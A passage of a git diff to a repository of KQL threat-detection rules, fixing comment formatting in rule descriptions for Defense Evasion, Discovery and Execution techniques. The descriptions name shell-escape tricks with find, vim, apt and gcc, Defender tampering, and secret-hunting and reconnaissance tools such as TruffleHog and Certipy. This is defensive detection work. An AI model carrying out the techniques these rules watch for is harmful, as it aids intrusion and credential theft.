-allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
-
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
+// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
index 3ee057af..d182d027 100644
--- a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
+++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
@@ -3,8 +3,7 @@
 // Date: 2022-02-16
 // Level: medium
 // Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
-This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
-
+// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
index 8b9c5f90..32824f74 100644
--- a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
+++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
@@ -3,8 +3,7 @@
 // Date: 2021-06-11
 // Level: medium
 // Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
-This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
-
+// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562
diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
index 7807774f..0be93573 100644
--- a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
+++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-07-01
 // Level: medium
 // Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
index 9b3691dc..c3d95d22 100644
--- a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
+++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2019-10-21
 // Level: medium
 // Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
-Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
-
+// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1220
 // False Positives:
diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
index 8fcbe710..b32cb1dd 100644
--- a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
+++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
@@ -3,8 +3,7 @@
 // Date: 2021-08-26
 // Level: medium
 // Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
-This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
-
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1012
diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
index 2174de59..8bc9d78c 100644
--- a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
+++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
@@ -3,10 +3,9 @@
 // Date: 2021-08-26
 // Level: medium
 // Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
-Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
-This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
-Make sure you set the SACL to propagate to its sub-keys.
-
+// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
+// Make sure you set the SACL to propagate to its sub-keys.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1012
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
index b0ad098f..b549c73f 100644
--- a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
+++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2020-10-19
 // Level: informational
 // Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
 // False Positives:
diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
index f0558c42..a23b223f 100644
--- a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
+++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
@@ -3,7 +3,6 @@
 // Date: 2021-12-13
 // Level: low
 // Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1217
 // False Positives:
diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
index a5a3af68..2d05a0d3 100644
--- a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
+++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
@@ -3,7 +3,6 @@
 // Date: 2022-12-22
 // Level: high
 // Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1135
diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql
index 91f88bca..64a183b5 100644
--- a/KQL/rules/Discovery/hacktool_certipy_execution.kql
+++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2023-04-17
 // Level: high
 // Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.credential-access, attack.t1649
 // False Positives:
diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql
index 34ad28ef..a3e8f54f 100644
--- a/KQL/rules/Discovery/hacktool_soaphound_execution.kql
+++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-26
 // Level: high
 // Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1087
diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
index 0fb156fc..bb4a6fe7 100644
--- a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql
@@ -3,10 +3,9 @@
 // Date: 2021-12-12
 // Level: low
 // Description: Detects the execution of "wmic" with the "group" flag.
-Adversaries may attempt to find local system groups and permission settings.
-The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
-Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
-
+// Adversaries may attempt to find local system groups and permission settings.
+// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1069.001
diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql
index 3a12f8a6..5e3c4ee1 100644
--- a/KQL/rules/Discovery/network_sniffing_macos.kql
+++ b/KQL/rules/Discovery/network_sniffing_macos.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-14
 // Level: informational
 // Description: Detects the usage of tooling to sniff network traffic.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.credential-access, attack.t1040
 // False Positives:
diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
index 49bf1bae..752a9f90 100644
--- a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
+++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql
@@ -3,7 +3,6 @@
 // Date: 2023-06-02
 // Level: low
 // Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1082
diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
index 18f18f6b..5b8b9489 100644
--- a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
+++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-16
 // Level: medium
 // Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
-This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
-
+// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1046
diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
index 79eeabda..c8380722 100644
--- a/KQL/rules/Discovery/pua_adidnsdump_execution.kql
+++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-01
 // Level: low
 // Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
-Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
-
+// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1018
diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
index 7b58afa9..c4f77b5c 100644
--- a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
+++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-25
 // Level: medium
 // Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
-It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
-
+// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1046
 // False Positives:
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql
index 167f98c1..4de2bd44 100644
--- a/KQL/rules/Discovery/pua_trufflehog_execution.kql
+++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2025-09-24
 // Level: medium
 // Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
-While it is a legitimate tool, intended for use in CI pipelines and security assessments,
-It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
-
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
 // False Positives:
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
index 1ea32800..c1cfd9c1 100644
--- a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
+++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
@@ -3,9 +3,8 @@
 // Date: 2025-09-24
 // Level: medium
 // Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
-While it is a legitimate tool, intended for use in CI pipelines and security assessments,
-It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
-
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
 // False Positives:
diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
index 1ca3a7f5..eb4754c8 100644
--- a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
+++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-07-06
 // Level: medium
 // Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
-Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
-
+// Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1057
diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
index 7a8b4c02..127e33b3 100644
--- a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
+++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-10-20
 // Level: medium
 // Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
-This detection focuses on the keywords that the attacker might use as a filter.
-
+// This detection focuses on the keywords that the attacker might use as a filter.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1518.001
diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
index f26d978b..e3fb57c5 100644
--- a/KQL/rules/Discovery/shell_execution_gcc_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
index b67ef0be..c35bbc2d 100644
--- a/KQL/rules/Discovery/shell_execution_via_find_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
index 6c2feb35..67b5bef1 100644
--- a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
index 7972f9a9..c927de1c 100644
--- a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
index 227da4e0..ad38aa3a 100644
--- a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
+++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2022-12-28
 // Level: medium
 // Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
-Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
index 863b4d79..2d60224e 100644
--- a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
+++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2019-01-16
 // Level: medium
 // Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
-Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-
+// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1087.001, attack.t1087.002
 // False Positives:
diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql
index 53b1b25c..d2a72589 100644
--- a/KQL/rules/Discovery/suspicious_where_execution.kql
+++ b/KQL/rules/Discovery/suspicious_where_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-13
 // Level: low
 // Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
-Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
-internal network resources such as servers, tools/dashboards, or other related infrastructure.
-
+// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
+// internal network resources such as servers, tools/dashboards, or other related infrastructure.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1217
diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
index 3e3bd8b8..18badf3a 100644
--- a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
+++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
@@ -3,9 +3,8 @@
 // Date: 2023-12-20
 // Level: medium
 // Description: Detects the use of "ioreg" which will show I/O Kit registry information.
-This process is used for system information discovery.
-It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
-
+// This process is used for system information discovery.
+// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1082
 // False Positives:
diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
index c317d814..2cdc3098 100644
--- a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
+++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
@@ -3,8 +3,7 @@
 // Date: 2024-01-02
 // Level: medium
 // Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
-This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
-
+// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
 // False Positives:
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
index 6c39bf7b..3ef42ec5 100644
--- a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-02
 // Level: medium
 // Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1518.001
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
index d9be9e23..400f1fad 100644
--- a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-02
 // Level: low
 // Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1518.001
 // False Positives:
diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
index 8c788be5..f68dcd15 100644
--- a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
+++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-26
 // Level: medium
 // Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
-
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1087
 // False Positives:
diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
index 3ff984b5..ca8c4e76 100644
--- a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
+++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
@@ -3,10 +3,9 @@
 // Date: 2023-01-26
 // Level: medium
 // Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
-and GPU driver products/versions.
-Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-
+// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
+// and GPU driver products/versions.
+// Some of these commands were used by Aurora Stealer in late 2022/early 2023.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1082
diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
index b15c895f..f0532d8f 100644
--- a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
+++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2022-12-28
 // Level: high
 // Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
-Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1083
diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
index e24bcbd5..5dae167d 100644
--- a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
+++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
@@ -3,7 +3,6 @@
 // Date: 2023-08-14
 // Level: medium
 // Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution
 // False Positives:
diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
index 48d40c08..cc1de169 100644
--- a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
+++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-05
 // Level: high
 // Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution
diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
index fcbfc541..57c666f5 100644
--- a/KQL/rules/Execution/capsh_shell_invocation_linux.kql
+++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "capsh" utility to invoke a shell.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
index 54471fa2..543d04a8 100644
--- a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
+++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-23
 // Level: high
 // Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
-This could be a sign of obfuscation of a fat finger problem (typo by the developer).
-
+// This could be a sign of obfuscation of a fat finger problem (typo by the developer).
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001
diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
index 15912d84..b8560c6d 100644
--- a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
+++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
@@ -3,8 +3,7 @@
 // Date: 2023-05-15
 // Level: medium
 // Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
-Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
-
+// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
 // MITRE Tactic: Execution
 // Tags: attack.execution
 // False Positives:
diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
index a46b9780..5b99e218 100644
--- a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
+++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-08-20
 // Level: medium
 // Description: Detects the execution of the BCP utility in order to export data from the database.
